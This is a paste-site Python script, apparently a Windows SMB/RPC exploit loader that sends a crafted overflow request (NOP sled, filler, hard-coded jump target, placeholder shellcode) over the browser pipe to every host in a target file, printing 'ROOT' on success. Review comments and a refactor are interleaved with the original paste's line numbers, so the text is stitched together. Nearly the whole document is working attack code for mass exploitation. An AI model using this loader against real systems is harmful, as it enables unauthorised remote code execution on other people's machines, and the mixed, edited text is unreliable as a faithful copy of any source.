[Py] Windows SMB exploit Loader/Scan

xB4ckdoorREAL Nov 4th, 2018 166 Never
  1. #DISCORD: https://discord.gg/PTW3yPp
  2.  
  3.  
  4. import struct
  5. import sys
  6. import time
  7. import os
  8.  
  9. from threading import Thread    
  10.                                  
  11. from impacket import smb
  12. from impacket import uuid
  13. from impacket import dcerpc
  14. from impacket.dcerpc.v5 import transport
  15.  
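# Placeholder for the payload that is written into the rgdwVarIndex field
# below.  As shipped it is literal ASCII text, not machine code, so the
# request carries no working payload.  Kept as a byte string so len() and
# concatenation behave the same on Python 2 (str) and Python 3 (bytes);
# on Python 2, b"..." is an ordinary str, so nothing changes there.
buf = b"shellcode line1"
buf += b"shellcode line2"


def _dword(value):
    """Pack *value* as a 4-byte little-endian unsigned integer.

    Produces exactly the bytes the original "\\xNN\\x00\\x00\\x00" literals
    did, but the numeric value is readable and the result is bytes on both
    Python 2 and Python 3.
    """
    return struct.pack("<I", value)


# Bytes placed in front of the payload inside rgdwVarIndex.  Naming them
# lets the filler length be derived from the actual prefix instead of the
# hard-coded "100000 - 10" of the original.
_PAYLOAD_PREFIX = b"\xd0\xba\x61\x41\x41" + b"\x90" * 5
# Total size of the rgdwVarIndex blob (prefix + payload + 0x41 filler).
_VARINDEX_SIZE = 100000

# DO NOT REMOVE THIS
# Request stub sent to opnum 0x1e of the interface bound in the main loop.
# Field names in the comments are the original author's annotations
# (MIB_OPAQUE_QUERY / MIB_OPAQUE_INFO layout) and are not verified here
# against the IDL.  NOTE(review): the author's comment on dwVarID ties it
# to a fixed address (off_64389048), so the value and the prefix bytes are
# presumably specific to one target build -- do not expect portability.
stub = _dword(0x21)            # dwPid = PID_IP (IPv4)
stub += _dword(0x2710)         # dwRoutingPID
stub += _dword(0x186a4)        # dwMibInEntrySize
stub += b"\x41" * 4            # _MIB_OPAQUE_QUERY pointer
stub += _dword(0x04)           # dwVarID (_MIB_OPAQUE_QUERY)
stub += b"\x41" * 4            # rgdwVarIndex (_MIB_OPAQUE_QUERY)
stub += _dword(0x186a4)        # dwMibOutEntrySize
stub += _dword(0x062d0bad)     # dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX
# rgdwVarIndex (_MIB_OPAQUE_QUERY): prefix, payload, then 0x41 filler up to
# _VARINDEX_SIZE.  The original's "\x41" * (100000 - 10 - len(buf)) went
# silently negative (empty filler, short blob) for an oversized payload;
# fail loudly instead so a too-large buf is noticed before anything is sent.
_pad = _VARINDEX_SIZE - len(_PAYLOAD_PREFIX) - len(buf)
if _pad < 0:
    raise ValueError("payload exceeds rgdwVarIndex size by %d bytes" % -_pad)
stub += _PAYLOAD_PREFIX + buf + b"\x41" * _pad
stub += _dword(0x04)           # dwId (_MIB_OPAQUE_INFO)
stub += b"\x41" * 4            # ullAlign (_MIB_OPAQUE_INFO)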
  31.  
  32.  
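# Target list: one host (IP or name) per line.  NOTE(review): every host in
# this file receives an unauthenticated RPC request carrying the stub above.
# That is a remote code-execution attempt against each of them -- only point
# this at systems you are explicitly authorised to test.
_TARGET_FILE = "bios.txt"
# Interface UUID/version the stub is bound to, and the opnum it is sent to,
# exactly as in the original.
_IFACE_UUID = ('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')
_OPNUM = 0x1e


def _send_stub(target):
    """Connect to the browser pipe on *target*, bind the interface, send the stub.

    Propagates whatever impacket raises on connect/bind/call failure.  The
    transport is disconnected on every exit path after a successful
    connect(), so a long scan does not leak one SMB session per host the way
    the original's `del trans` / `del dce` did (deleting the references never
    closed the socket).  Note that dce.call() only transmits the request and
    does not wait for or parse a response, so returning without an exception
    means "request sent", not "target exploited".
    """
    trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
    trans.connect()
    print("[+] Connected Successfully!")
    try:
        dce = trans.DCERPC_class(trans)
        dce.bind(uuid.uuidtup_to_bin(_IFACE_UUID))
        dce.call(_OPNUM, stub)
    finally:
        trans.disconnect()


with open(_TARGET_FILE) as fp:
    # enumerate() keeps the original numbering: cnt counts every line,
    # blank ones included.
    for cnt, raw in enumerate(fp):
        # The original formatted the unstripped line into the binding string,
        # so the trailing "\n" (and any "\r") ended up inside
        # "ncacn_np:<host>\n[\pipe\browser]" -- only the log line was
        # rstrip()'d.  Strip here, and skip blank lines instead of trying to
        # connect to "ncacn_np:[\pipe\browser]".
        target = raw.strip()
        if not target:
            continue
        print("[%d] Attacking ---> %s" % (cnt, target))
        print("Attempting Connection")
        try:
            _send_stub(target)
        except Exception as exc:
            # Exception, not a bare except: the original also swallowed
            # KeyboardInterrupt/SystemExit, so Ctrl-C could not stop the scan.
            # Also report *why* the host failed; the original gave no reason.
            print("[+] :( NO ROOT")
            print("    %s: %r" % (target, exc))
        else:
            print("[+] ROOOOOOOOOOOOOOOT | Exploit Sent Successfully")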